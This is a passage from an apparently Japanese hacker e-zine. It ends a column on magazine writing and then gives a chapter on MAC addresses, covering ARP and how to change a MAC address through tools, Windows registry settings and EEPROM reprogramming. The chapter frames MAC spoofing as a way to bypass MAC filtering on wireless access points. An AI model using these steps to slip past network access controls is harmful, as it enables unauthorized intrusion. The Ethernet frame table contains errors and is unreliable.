つまり、PCとインターネット環境さえあれば、ライターになるための環境が あるということです。  安上がりでいい商売だと思いませんか? ■0x04.) 実際にすること  編集者とテーマなどを話し合い、プロットを立てて、それに沿った情報を集め て原稿をテキストエディタで書きながら誌面で使う画像を揃えるわけです。  完成したものを、圧縮してFTPアップロードやメールで送信したり、大きなサイ ズのものはCD-Rなどに焼いて郵送したりして編集者に原稿を渡します。  そして、それを編集者が編集や校正、ものによってはリライトをかけて、レイ アウトデザイナーに渡して、誌面の体裁となりゲラとなります。  そこからは、ひたすら、紙(ゲラ)を睨み、誤字脱字、また、表現のおかしい 部分に対して赤色のボールペンで赤字を入れて、それを数回繰り返して完成させ ます。  ……たった、これだけのことですが、この作業の中に様々なルールが存在しま す。  それがわからないから敷居の高い世界に思えるのかもしれません。  次回より、テクニカルな内容を交えながら、PC、ソフトウエア、原稿の書き 方、画像の処理、業界の書式ルール、送信について、ギャランティ、裏話……な どなど、これらを解説していきたいと思います。    誤字脱字ありませんように〜!  ライタ〜!へ〜んたいっ!とぁっ!(`Д´) x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 第5章:MACアドレス再考 --- 著者:IPUSIRON x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x ■0x01.) MACアドレスとは  ネットワークカードなど、ネットワーク製品はそれぞれMACアドレス(MAC:Media Acess Control)という6バイトの値をもっています。この値は、シリアルナンバー のようなもので、基本的にはユーザーが自分で設定したりするのではなく、下位3 バイトを使ってメーカーがあらかじめ設定かつ登録してあります。上位3バイトは IEEEが定めるメーカーコードであります。  例えば、「00:00:4C:12:34:56」などがMACアドレスに当たります。本によって は、区切り文字として、「:」の変わりに「-」を使っている場合もあります。  OSI7層構造モデルにおけるハードウェア層(物理層)とデータリンク層は主に ハードウェアの規格です。  物理層ではネットワーク伝送媒体の物理的な特性を定義されます。  そして、データリンク層では信号を変換する相手のコンピュータを認識しますが、 1つ上のネットワーク層のIP(インターネットプロトコル)とは異なります。  データリンク層を利用したプロトコルであるEthernetなどでMACアドレスが利用 されます。  例えば、Ethernet環境でパケットを送出する場合、ネットワーク層(データリン ク層の1つ上の層)で作られたIPパケット(IPデータグラム)の先頭に、データリ ンク層で作られたEthernetヘッダが付きます。このMACヘッダは送信元である自分 の持つMACアドレスとデータを受け取る側のMACアドレス、そしてフレームのタイプ の情報を持っています。そして、IPデータグラムの後ろにフレームチェックシーケ ンスを追加します。  追加された後のパケットをMACフレームまたはEthernetパケットと呼ばれます。  MACフレームの構造は次のようになります。 [宛先MACアドレス][送信元MACアドレス][フレームのタイプ][IPデータグラム][フ レームチェックシーケンス] ========================================================================= 先頭から | 役割 | ビット数 | 概要 ------------------------------------------------------------------------- 0〜7ビット目 | 宛先MACアドレス | 8 | ICMPタイプの指定。 | | | RFC792参照。 ------------------------------------------------------------------------- 8〜15ビット目 | 送信元MACアドレス | 8 | ------------------------------------------------------------------------- 16〜17ビット目 | フレームのタイプ | 2 | 上位層のプロトコルがIPの | | | 場合、このEYTPEには16進数 | (ETYPE) | | で0x0800がセットされる。 ------------------------------------------------------------------------- 18ビット目以降 | データ | | データそのもの。 ========================================================================= ■0x02.) MACアドレスの特徴  MACアドレスの特徴を次に列挙します。 ・48ビットの固定アドレス ・上位24ビットはベンダコードで、IEEEが割り当てる。 ・下位24ビットはベンダ内コードで、ベンダの責任で全世界でユニークに。 ・ブロードキャストアドレスは、全ビットが1。(ff:ff:ff:ff:ff:ff) ■0x03.) MACアドレスとIPアドレスの対応付け、そしてARPプロトコル  MACフレームは転送されるごとに、宛先MACアドレスと送信元MACアドレスのタイ プが書き換えられていきます。  一方、IPデータグラム内のヘッダ部分にある宛先IPアドレスは、最終的まで到達 するまで書き換えられません。  IPアドレスを持っているNICやネットワーク機器はMACアドレスも持っています。  一般的にLANではEthernetという通信プロトコルが使われます。このプロトコル では、MACアドレスを利用してパケット通信を行うので、あからじめ宛先のコンピ ュータに当たるMACアドレスを調べる必要があります。  このMACアドレスを調べるための通信プロトコルをARP(Address Resolution Pro tocol:アドレス解決プロトコル)と呼びます。  ARPはルーティング情報の中でもきわめて重要なものです。簡単に言えば、IPアド レスをもとにしてMACアドレスを調べるプロトコルです。  データを送るときに、IPパケットに入れて送るわけですが、その時に宛先のMAC アドレスが必要になります。ここで、ARPが登場します。ARP要求メッセージが、宛 先に向かってブロードキャストされ、宛先、つまり受信側はハードウェアアドレス でこれに応答します。この応答を送信元マシンが捕らえて、転送プロセスが開始で きるようになるのです。  また、キャッシュ機能も持ちます。リモートマシンやネットワークのMACアドレ スをキャッシュに記憶しておき、次回からはARP要求の問い合わせをしないのです。 これにより、時間とネットワークリソースの節約が可能です。ARPによって得られ たMACアドレスの情報は、一時的保存されます。  DOS窓で「arp -a」と入力すると、「Internet Address」「Physical Address」 「Type」の3つに分かれてARPにおけるIPアドレスとMACアドレスの対応が表示さ れます。 ■0x04.) MACアドレスの確認の仕方 ●Windows95/98/MEの場合  スタートメニュー>「ファイル名を指定して実行」>「winipcfg」と入力。 ●WindowsNT/2000/XPの場合  DOS窓で「ipconfig /all」と入力。 ----- C:\>ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : j-sek0nly2fku8b Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter ローカル エリア接続: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Desktop Adapter Physical Address. . . . . . . . . : 00-10-DC-D9-BE-C2 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 192.168.1.11 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 DHCP Server . . . . . . . . . . . : 192.168.1.1 DNS Servers . . . . . . . . . . . : 218.176.253.65 43.224.255.20 Lease Obtained. . . . . . . . . . : 2003年7月10日 20:02:16 Lease Expires . . . . . . . . . . : ----- ●Linuxの場合  ipconfigに-aオプションをつけて実行すればよい。1番目のNIC名はデフォルト でeth0のはずです。 ----- # ifconfig -a eth0 Link encap:Ethernet HWaddr 00:60:08:C4:99:AA inet addr:131.225.84.67 Bcast:131.225.87.255 Mask:255.255.248.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:15647904 errors:0 dropped:0 overruns:0 TX packets:69559 errors:0 dropped:0 overruns:0 Interrupt:10 Base address:0x300 ----- ●Solaris/SunOSの場合  ipconfigに-aオプションをつけて実行すればよい。1番目のNIC名はデフォルト でle0またはie0のはずです。 ----- # ifconfig -a le0: flags=863 mtu 1500 inet 131.225.80.209 netmask fffff800 broadcast 131.225.87.255 ether 8:0:20:10:d2:ae ----- ●FreeBSDの場合  dmesgコマンドを実行します。 ●HP-UXの場合  lanscanコマンドを実行すればよい。1番目のNIC名はデフォルトでlan0のはず です。 ----- $ lanscan Hardware Station Dev Hardware Net-Interface NM Encapsulation Mjr Path Address lu State NameUnit State ID Methods Num 2.0.2 0x08000935C99D 0 UP lan0 UP 4 ETHER 52 ----- ●MacOSの場合 ◎Open Transport 1:AppleTalkコントロールパネルを開きます。 2:Editメニューにいき、User Modeを選択します。 3:Advanced radio buttonを選択して、OKをクリックします。 4:infoをクリックします。 5:すると、AppleTalk InfoウィンドウにMACアドレスが表示されるはずです。 ◎Apple System Profiler 2.1.2  The Network Overview(システムプロフィールタブ下)はMACアドレスの詳細情 報を表示します。  ただし、GetMyAddressの最近のバージョンと他のネットワークユーティリティ はMacOS 7.5.2(例えば、7200,7500,8500,9500のようなPCIベースのPowerMacinto shコンピュータ)では動きません。 ●No OSの場合(OSさえもインストールしていない場合)  FCC3WのPREPあるいはWH8HWのYolandaから、Fermi LinuxのFDを入手してくださ い。これはOSをインストールしなくても利用できます。マシンをブートすると、 「Choose a Language」(言語を選べ)というスクリーンが表示されます。それか ら、[Ctrl]+[Alt]+[Fn4]を押します。すると、「<6>eth0:」という文字列から始 まる行が表示されます。その行の終わり近くに16進数の数が分割されて表示され ます。それがMACアドレスです。  最近は、1CD Linuxなどの利用の方が一般的かもしれません。 ●他のOSなど  arpコマンドを使うことで、LAN内に接続されている機器のMACアドレスを間接的 に調べることができます。  しかし、通常では広域な機器まで認識されていないことが多い。そこで、一度 ブロードキャスト宛(xxx.xxx.xxx.255)(※1)にPingパケットを送信してから、 arpコマンドを使えばLAN内における稼動中の機器を参照することが可能です。 C:\>arp -a Interface: 192.168.198.1 on Interface 0x2 Internet Address Physical Address Type 192.168.198.254 00-50-56-c0-48-23 dynamic Interface: 192.168.88.1 on Interface 0x3 Internet Address Physical Address Type 192.168.88.254 00-50-56-c0-18-be dynamic C:\>ping 192.168.1.255 Pinging 192.168.1.255 with 32 bytes of data: Reply from 192.168.1.255: bytes=32 time<10ms TTL=64 Reply from 192.168.1.255: bytes=32 time<10ms TTL=64 Reply from 192.168.1.255: bytes=32 time<10ms TTL=64 Reply from 192.168.1.255: bytes=32 time<10ms TTL=64 Ping statistics for 192.168.1.255: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\>arp -a Interface: 192.168.198.1 on Interface 0x2 Internet Address Physical Address Type 192.168.198.2 00-00-00-00-00-00 invalid Interface: 192.168.1.11 on Interface 0x1000005 Internet Address Physical Address Type 192.168.1.1 00-90-99-50-8b-e1 dynamic ←ルーター 192.168.1.5 00-90-99-10-72-0f dynamic 192.168.1.10 00-90-cc-0d-a5-71 dynamic  この方法で、LAN内に接続されたルーター、PS2、XboxのMACアドレスを簡単に調 べることができます。 (※1)ブロードキャストアドレスとは当該ネットワークに所属するホスト全体 を表し、そのネットワークのIPアドレスのうち、最も大きな番号(クラスAから暮 らすCの場合はホスト部が全て1の番号)で表します。ネットワーク内の全てのホ ストにデータ(IPパケットなど)を送るときに用いられます。 ■0x05.) MACアドレスの書き換えの概要  何故かMACアドレスは書き換えできないという神話がありますが、実際にはでき ます。それも幾つかの方法があります。  例えば、昔のNICにはMACアドレスを書き換えることが可能なものがあり、Linux のコマンドを使って書き換えたり、現在ではそれ専用のツールも存在します。詳 細は後述します。  アタッカーがMACアドレスを書き換えることによって、次のようなアタックを行 う可能性があります。 ●MACアドレススプーフィング  これはMACアドレスを何らかの方法で書き換え・変更することです。今回はこれ に焦点を当てていきます。  どんな場面にこのテクニックを利用するのかと言うと、無線LANの内部ネットワ ークに不正侵入などが挙げられます。  無線LANを構築する際に使うアクセスポイント(APと呼びます)のセキュリティ 機能の一つにMACアドレスの制限というものがあります。この機能を有効にしてお くことによって、あからじめ設定したMACアドレス以外はそのAPにアクセスできな いようにすることができます。しかし、MACアドレスは書き換えられるので、MAC アドレスを認証に利用しようとすることが根本的に間違いだったわけです。 ●ARPスプーフィング  通信プロトコルのARPは認証として、MACアドレスに基づいているので、これを 偽装することによって、信頼関係のあるホストのMACアドレスを装い、不正アクセ スしようとするテクニックです。  ARPの原理から、次の3通りが考えられる。 ・ARP応答パケットを偽造して送信する ・ARP要求パケットを偽造してから、送信し直す ・偽造したARP要求パケットを送信する ■0x06.) 古いNICにおけるMACアドレスの書き換え ========================================================================== 使われる頻度 | ★ -------------------------------------------------------------------------- 容易さ | ★(入手困難だから) -------------------------------------------------------------------------- 与える影響 | ★★ -------------------------------------------------------------------------- 効果 | ★ -------------------------------------------------------------------------- 総合 | ★ ==========================================================================  古いNICの場合は、ユーザー側でMACアドレスを変更できる可能性があります。 ■0x07.) ツール利用によるMACアドレスの書き換え ========================================================================== 使われる頻度 | ★★★★ -------------------------------------------------------------------------- 容易さ | ★★★ -------------------------------------------------------------------------- 与える影響 | ★★★ -------------------------------------------------------------------------- 効果 | ★★★★ -------------------------------------------------------------------------- 総合 | ★★★★ ==========================================================================  SMAC(http://www.klcconsulting.net/smac/)や Drawbridge(http://www.net.tamu.edu/drawbridge/index.html)などのツールを 使うことでMACアドレスを書き換えることが可能な場合もあります。 ■0x08.) コンパネ設定によるMACアドレスの書き換え <WindowsXP編> ========================================================================== 使われる頻度 | ★ -------------------------------------------------------------------------- 容易さ | ★★★ -------------------------------------------------------------------------- 与える影響 | ★★★ -------------------------------------------------------------------------- 効果 | ★★★★★ -------------------------------------------------------------------------- 総合 | ★★★ ==========================================================================  これは使用しているNICによっては可能ではない方法です。もし、あなたのNIC がクローンMACアドレス機能をサポートしていなければ、ここで解説する方法でM ACアドレスを書き換えることができます。 1:スタートメニュー>「All Programs」>「Control Panel」上で、 「Network Connections」をダブルクリックします。 2:すると、「Network Connections」ウィンドウが表示されるはずです。  「Local Area Connection」を右クリックして、「プロパティ」を選択します。 3:「Local Area Connection」プロパティウィンドウが表示されます。 「Configure」をクリックして、「Advanced」タブを選択します。  「Property section」をスクロールダウンして、「Network Address」あるいは 「Locally Administered Address」という項目を探し、それをクリックします。  右側に「Value」と表示されたら、そのラジオボタンを押して偽装したいMACア ドレスの値を入力します。その際、区切りは-です。例:12-34-56-AB-CD-EF。 4:DOS窓を開き、「ipconfig /all」あるいは「net config rdr」で設定を確認 します。  設定が反映されていれば、成功です。マシンを再起動すれば完了です。  もしうまく設定が反映されていなければ、次の「レジストリ変更によるMACアド レスの書き換え <WindowsXP編>」を参考にしてください。 ■0x09.) レジストリ変更によるMACアドレスの書き換え <WindowsXP編> ========================================================================== 使われる頻度 | ★ -------------------------------------------------------------------------- 容易さ | ★★★ -------------------------------------------------------------------------- 与える影響 | ★★★★★ -------------------------------------------------------------------------- 効果 | ★★★★★ -------------------------------------------------------------------------- 総合 | ★★★★ ==========================================================================  この方法はWindowsのレジストリの知識が必要とされます。もし、あなたがあま りWindowsのレジストリに慣れていなければ、この方法は止めたほういいと思いま す。もし、この方法を試すなら、レジストリのキーをバックアップしておくべき です。 1:DOS窓上で「ipconfig /all」と入力して、ネットワークの設定を確認します。 「Physical Address」と「Description」に着目してください。特に「Physical A ddress」にMACアドレスが表示されます。 2:次に「net config rdr」と入力します。すると次のように表示されました。 3:ステップ1,2より次のことが判明しました。 ・MACアドレスは00-02-B3-0B-8B-08 ・Workstationはアクティブ ・NetbiosSmb (000000000000) ・NetBT_Tcpip_{20B93FCA-BE9F-44E6-A821-D8097219770F} (0002B30B8B08)  NetBT_Tcpipの{}内がGUIDです。  これらの値は後ほど使用しますので、テキストエディタなどにコピペしておき、 保存しておいてください。 4:スタートメニュー>「Run」>「regedt32」と入力してレジストリエディタを 起動します。 5:レジストリのバックアップと取っておきます。  「HKEY_LOCAL_MACHINE on Local Machine」サブウィンドウをクリックし、ルー トキーである「HKEY_LOCAL_MACHINE」をクリックし、メニューの「Registry」>「 Save Subtree As」でレジストリのバックアップが取れます。これは安全な場所に 保管しておきます。FDに保存しておくのが一番良いかもしれません。 6:「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972- E325-11CE-BFC1-08002BE10318}」をダブルクリックして、木(tree)を展開します。 つまり、木構造を掘っていくということです。すると、「0000」「0001」「0002」 などという4つの数字がサブキーになっています。これらは特別のネットワーク・ アダプターを表しています。 7:「0000」というサブキーから始めます。「0000」をクリックします。もし、こ れがMACアドレスを偽装したいNICならば、右側のリストから「DriverDesc」を選択 します。どのように判断するのかと言うと、「DriverDesc」キーを見ればよいわけ です。  それから、{}内のGUIDと一致しているかどうかを、「NetCfgInstanceID」キーで チェックします。  通常、0000が最初のNICを含んでいます。この例では、0001のNICを選択して話を 進めます。 8:「NetworkAddress」というサブキーが存在するかどうかチェックします。もし、 存在しなければ新規作成します。適当なところを右クリックして、「new」>「Str ing Value」を選択すれば新規作成できます。  すると、「New Value #1」というサブキーができますので、このサブキー名を 「NetworkAddress」に変更します。 9:「NetworkAddress」キーの値を入力します。  ステップ8で作成したサブキーである「NetworkAddress」をダブルクリックし ます。すると、「Edit String」ボップアップボックスが表示されます。「Value name」には「NetworkAddress」、「Value data」には新しいMACアドレスの値に変 更します。ここでは、「00-02-B3-0B-9B-09」に変更してみます。 10:変更したMACアドレスを反映させるには、2つの方法があります。  1番目の方法はシステムを再起動する必要がありません。 ○方法1 (i)スタートメニュー>「Setting」>「Control Panel」を選択して、「Network Connections」をダブルクリックします。 [注意]DHCPクライアントになっているならば、新しいIPアドレスが割り振れる可 能性があります。 (ii)MACアドレスを変更したいネットワークアダプタを選択して、右クリックし、 「Disable」を選びます。 (iii)今度は「Enable」を選び、アクティブにします。これで反映されているはず です。 (iv)ステップ3で設定反映されているはずですが、反映されていないようならば、 再起動してください。 (v)本当に変更されているかどうか「ipconfig /all」で確認してください。 ○方法2  マシンを再起動すればよい。 11:最終的にDOS窓上で「ipconfig /all」コマンドを実行して、MACアドレスが 変更されているかどうか確認してください。 ■0x10.) EEPROM書き換えによるMACアドレスの書き換え ========================================================================== 使われる頻度 | ★ -------------------------------------------------------------------------- 容易さ | ★ -------------------------------------------------------------------------- 与える影響 | ★★★★ -------------------------------------------------------------------------- 効果 | ★★★★ -------------------------------------------------------------------------- 総合 | ★★ ==========================================================================  いずれ、あなたは同じ物理的なネットワークアドレス(MACアドレスのこと)を 持つ2つのマシンを持つ必要があるかもしれません。例えば、スプーフィングの実 験やMACアドレスによる接続拒否を回避して内部ネットワークに接続したい場合( 無線LANのAPやルーターにはMACアドレスによる接続拒否というセキュリティ機能が 備わっている)に役に立つかもしれません。  ご存知のようにMACアドレスは48ビット(6バイト)のユニークな整数値で構成 される。Ethernet NIC(Network Interface Card)ハードウェアメーカーはIEEE (Institute for Electrical and Electronic Engineers)からEthenetアドレス の区域を購入しています。そして、個々のマシン(厳密にはNICにつき1個なので 1台のマシンに複数のNICを刺せばそれだけ複数のMACアドレスがあることになる )を認識させるために、その区域を製造しているNICのMACアドレスの一部(前半 3バイト分)に割り当てているわけです。IEEEのグローバルアドレス範囲、IEEE によっては割り当てられ登録されています。  利用できるNICの多くでは、MACアドレスは半導体(semiconductor)ベースのメ モリに記録されており、MACアドレスの他にも次の情報が記録されています。 ・I/Oベースアドレス ・Interrupt ・インタフェースの型(例、10BASE-T,AUI,10BASE-2など) ・チェックサム(checksum) ・他の設定情報  少し前NICは旧式82S123または74S288という1回だけ書き込むことができる256 ビットデバイスを使用しています。これらのデバイスは大きく(16ピン)、コス トもかかるしプログラムも大変です。  そこで、今のNICの多くは、シリアルEEPROM(Electrically Erasable Programm able Read-Only Memory)を使って、これに情報を記録している。受け皿方式で抜 き差し可能することもあるが、たびたび通常基盤にをはんだ付けします。それら のデバイスはMicrowireと呼ばれる3つのワイヤインタフェースを使い、内容を転 送する。EEPROMはカードメーカーがプログラムします。同様に、シリアルEEPROM はEthenetコントローラICから直接プログラムされます。よって、MACアドレスと 他の設定情報はPCのソフトウェアを通じて記録されるわけです。それらのデバイ スのよいところは、エラーが無ければ何度でも(といっても数千回、数万回とい った限度はある)書き換え可能な点です。必要なメモリの上限のために、それら のデバイスは大抵256ビット(93C06)あるいは1024ビット(93C46)の両々を持ち ます。この項の目的はこのシリアルEEPROMの中身を書き換えて、自由にMACアドレ ス(とチェックサム)を修正することです。  NICの心臓はEthernet InterfaceあるいはEthenet Controllerと呼ばれるICです。 このデバイスはEthenetとPCバスの間をやり取りするのに使われます。このICチッ プは本当にゆっくり走ります。というのも、NIC上のほかのコンポーネントが通常 インタフェース(interface)/接着剤(glue)ロジックだからです。もちろん、E thernetコントローラーのメーカーによっては多くの違いは存在します。あるカー ドはNational Semiconductor製のDP83905-EB AT/LANTIC (詳細はhttp://www.national.com/an/AN/AN-897.pdfを参照せよ)を使用し、ISA バスとやり取りします。他のデバイスは、PCIバスとやり取りするために、Realtek RTL8129とRTL8029 Fast Ethenet Controller (詳細はhttp://www.realtek.com.tw/cn/NEW/doc/RTL8129-new.htmを参照せよ)を 含んでいます。普通は後者のカードが多いようです。  Microsystems LAN9000ファミリとUMC UM9003では、Ethenetコントローラー・イ ンタフェースが直接シリアルEEPROMとデータをやり取りします。  この項では、AT/LANTICデバイスを使ったPCベースのNICを取り扱います。AT/LAN TICこのデバイスはNovell NE2000 Plusカードをエミュレートできます。最初に調 べることは、AT/LANTICデータシートより上にくる前に実行できるが、その結果EEP ROMの中身を厳密にマッチし、確認することを助けてくれます。  それでは、MACアドレスをどのように見つけるだろうか?  しばしば、NICのMACアドレスはラベルに印刷されていたり、カード自体に印刷 されていたりする。もしカードがケースの中にあったりしてアクセスできない場 合は、侵入しない方法でMACアドレスを調べたいはずです。そんな場合はすでに前 述した方法を取って欲しい。  シリアルEEPROMにはどんなものがあるのだろうか。  まず、異なるNIC上にあるシリアルEEPROMからデータを単に読み出すことについ て解説します。そうすることによって、それらのよいところや違いを理解すること ができ、MACアドレスの存在を確認できるからです。 ○メーカー:National Semiconductor モデル:NSC? EEPROM:93LC06 MACアドレス:08:00:17:03:C0:E5 データ: 0008 0317 E5C0 0000 0500 010D 01DA 5757 4242 0000 0000 0000 0000 0000 0020 0020 ○メーカー:Ansel Communications モデル:N2000 Plus 3 EEPROM:93C46 MACアドレス:00:40:90:80:07:7E データ: 4000 8090 7E07 FFFF FFFF FFFF FFFF 5757 4242 FFFF FFFF FFFF FFFF FFFF 0100 FF20 ○メーカー:Microdyne モデル:NE2000 Plus 3 EEPROM:93C06 MACアドレス:00:80:29:E7:C2:9C データ:N/A ○メーカー:Linksys モデル:Ether16 EEPROM:93C46 MACアドレス:00:40:22:2A:82:82 データ: 4000 4405 A717 0108 020A 5464 00D8 0000 0000 0000 0000 0000 0000 0000 0000 0000 ○メーカー:Genius モデル:GE2000 II EEPROM:93C46 MACアドレス:00:40:33:2A:82:82 データ: 4000 2A33 8283 5805 0000 0000 0000 5757 4242 0000 0000 0000 0000 0000 2100 0020 ○メーカー:Winbond モデル:HT-2003CT EEPROM:93C46 MACアドレス48:54:33:01:48:24 データ: 5448 0133 2448 0000 5448 0133 2448 5757 4242 0000 0000 0000 0000 0000 4040 0020  以上から、MACアドレスがどのように記録されているかが推測できるでしょう。 2桁ごとに逆転しているのが特徴ですが、データの0〜12部分までのところがMA Cアドレスに対応していることが分かります。  そして、多くのデータが15バイト目以降の「5757 4242」が共通しています。  NICが93C46 EEPROMを使っているために、32ビットのデータが4回繰り返される か(128バイトの容量を満たすため)、0x00で満たされます。EEPROM内のデータ量 はEthenetコントローラ ICに依存します。多くの新しいコントローラは93C46まで と設計されています。なぜ93C46かというと、有効性プロダクション状態のためで す。  Microdyne NE2000 NICのデータがN/Aになっていることが分かると思います。こ れは誤ってデータを上書きしてしまい、元データが分からなくなってしまったとい うミスがあったからです。  これでMACアドレスはEEPROMに記録されていることが分かりました。他にもデバ イスに共通して「5757 4242」という文字列があったことが分かりました(Linksys といった例外はある)。  この文字列は何を意味しているのだろうか?  これは次のAT/LANTICのシリアルEEPROMのメモリマップの表を見ると、「WW BB」を意味することが分かります。  次に、AT/LANTICのシリアルEEPROMのメモリマップの表を示す。 ========================================================================== 番地(Addr) | Bits 15-8 | Bits 7-0 ========================================================================== 00 | MACアドレス1 | MACアドレス0 -------------------------------------------------------------------------- 01 | MACアドレス3 | MACアドレス2 -------------------------------------------------------------------------- 02 | MACアドレス5 | MACアドレス4 -------------------------------------------------------------------------- 03 | チェックサム | 05(8013型) -------------------------------------------------------------------------- 04 | 00(使われない) | 00(使われない) -------------------------------------------------------------------------- 05 | 00(使われない) | 00(使われない) -------------------------------------------------------------------------- 06 | 00(使われない) | 00(使われない) -------------------------------------------------------------------------- 07 | 57(アスキー文字「W」) | 57(アスキー文字「W」) -------------------------------------------------------------------------- 08 | 42(アスキー文字「B」) | 42(アスキー文字「B」) -------------------------------------------------------------------------- 09 | 00(使われない) | 00(使われない) -------------------------------------------------------------------------- 0A | 00(使われない) | 00(使われない) ==========================================================================  多くのNICでは、シリアルEEPROMはジャンパーレス解決を実行します。EEPROMは 全ての必要な設定と初期値の情報(I/Oアドレス、interrputなど)を記録してい ます。ジャンパーレスの設定を持つNICは次のConfig A,B,Cの使用に必要です。 ○Config A: ========================================================================== Bit | Use ========================================================================== 0 | I/Oアドレス -------------------------------------------------------------------------- 1 | I/Oアドレス -------------------------------------------------------------------------- 2 | I/Oアドレス -------------------------------------------------------------------------- 3 | Interrupt -------------------------------------------------------------------------- 4 | Interrupt -------------------------------------------------------------------------- 5 | Interrupt(もし8を選んだら) -------------------------------------------------------------------------- 6 | Fast read -------------------------------------------------------------------------- 7 | NE2000/Shared Memory ========================================================================== ○Config B: ========================================================================== Bit | Use ========================================================================== 0 | AUI/Coax/TPI -------------------------------------------------------------------------- 1 | AUI/Coax/TPI -------------------------------------------------------------------------- 2 | Good Link Test Disable -------------------------------------------------------------------------- 3 | IO16 Bug Fix Enable -------------------------------------------------------------------------- 4 | IO CHRDY Bug Fix Enable -------------------------------------------------------------------------- 5 | - -------------------------------------------------------------------------- 6 | Boot PROM Write Enable -------------------------------------------------------------------------- 7 | - ========================================================================== ○Config C: ========================================================================== Bit | Use ========================================================================== 0 | Boot PROM Address & Size -------------------------------------------------------------------------- 1 | Boot PROM Address & Size -------------------------------------------------------------------------- 2 | Boot PROM Address & Size -------------------------------------------------------------------------- 3 | Boot PROM Address & Size -------------------------------------------------------------------------- 4 | RAM Size 8k or 32k -------------------------------------------------------------------------- 5 | 4 or 8 Interrupts -------------------------------------------------------------------------- 6 | Core CLK = 20MHz or BSCLK -------------------------------------------------------------------------- 7 | Allow access to configure registers ==========================================================================  それでは比較してみよう。  Genius GE2000 IIの5つのエントリを使って、獲得したデータと期待されたデー タを比較してみます。これにより、シリアルEEPROM内の情報と各バイトのマッチン グを調べることができます。そして、MACアドレスを変更するためにプログラミン グするべきことが自ずと分かるはずです。  これから、シリアルEEPROM内のMACアドレスとチェックサムの変更の仕方を論じ ます。  バイト単位のGenius GE2000 IIのデータのブレークダウンを次に示します。 ========================================================================== Location | Data ========================================================================== 0 | 40 1 | 00 2 | 2A 3 | 33 4 | 82 5 | 83 6 | 58 7 | 05 8 | 00 9 | 00 10 | 00 11 | 00 12 | 00 13 | 00 14 | 57 15 | 57 16 | 42 17 | 42 18 | 00 19 | 00 20 | 00 21 | 00 22 | 00 23 | 00 24 | 00 25 | 00 26 | 00 27 | 21 28 | 00 29 | 00 30 | 20 ==========================================================================  すでに分かっている通り、最初の6バイト(ロケーション0〜5)はMACアドレ スです。  その次のバイト(ロケーション6)はチェックサムです。チェックサムはEEPROM 内の始めの8バイトの合計の重要な最小バイトが0xFFであると計算されます。この 例では0x58となります。 0x40+0x00+0x2A+0x33+0x82+0x82+0x05+チェックサム(0x58)&0xFF=0xFF  全てのバイトはロケーション27を通じてマッチしました。残った3つのバイト は設定バイトだ。カードからカードへ変わります。 Config A(ロケーション29)=0x00 Config B(ロケーション38)=0x21 Config C(ロケーション31)=0x20  ロケーション30は、特別0x73となっています。我々が見てきた全てのカードは 0x00あるいは0xFFを持っていました。このバイトは、AT/LANTICのチップの特徴で す。  シリアルEEPROMプログラミングの話題に入ります。  NICカードのMACアドレスを変えるために、シリアルEEPROMを再びプログラムす る必要が出てきます。最低でも新しいMACアドレスとチェックサムのバイトをシリ アルEEPROMに反映させるためです。大抵のデバイスプログラマはシリアルEEPROM を扱うことができ、サンプルのパラレルポートとRS232経由でプログラムを送り込 みます。NIC上のEthenetコントローラ ICのためのデータシートを探すだけなら、 プログラムの経験が無くても可能です。  MicrochipはシリアルEEPROMデザイナ・キットを販売しています。これはこの解 説にもってこいのキットであり、他方においても高く評価されています。必要な ソフトウェアとマニュアルはWebサイト上から手に入ります。  もし、さらに強いデバイスプログラマになりたいならば、他の開発ソフトウェ ア群も利用することです。それらは多くのマーケット上で利用されている。それ らの大半は、マイクロプロセッサと大きなメモリデバイスプログラミングに焦点 を当てている。しかし、全て全てシリアルEEPROMをサポートしているとは限らな い。  次に、利用できる低価格のプログラム開発キットを紹介します。 ========================================================================== メーカー | Webサイト | モデルナンバー ========================================================================== BP Microsystems | http://www.bpmicro.com/ | Any,BP-1148,BP-1200 -------------------------------------------------------------------------- Data I/O | http://www.dataio.com/ | Any,ChipWriter Portable -------------------------------------------------------------------------- M2L Electronics | http://www.m21.com/ | EZ-EP ==========================================================================  もし、自分でプログラムする必要性を感じたら、まだ読む続けるべきです。シ リアルEEPROMのためのインタフェースは最小の接続を必要とします。  次の図は8ピンDIPのMicrochip 93C46デバイスを表したものです。 |------| CS--|1 8|-Vcc CLK-|2 7|-NC DI--|3 6|-NC DO--|4 5|-Vss |------| ↑典型的なシリアルEEPROM(DIPパッケージ)  デバイスには3つの入力ラインがあります。Chip Select(CS)、Clock(CLK )、Data IN(DI)の3つです。  そして、1つの出力ラインがあります。それはData Out(DO)です。 ■0x11.) 参考文献 [1]『Linux版 クラッカー迎撃完全ガイド』 [2]『TCP/IPセキュリティ』 [3]『Router & Packet Filtering』 [4]『徹底解説 LAN工事実践テクニック』 [5]『ポート番号のしくみ』 [6]「How to Modify Your Mac address in Windows XP」 [7]「MAC Address Cloing」 x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x --- 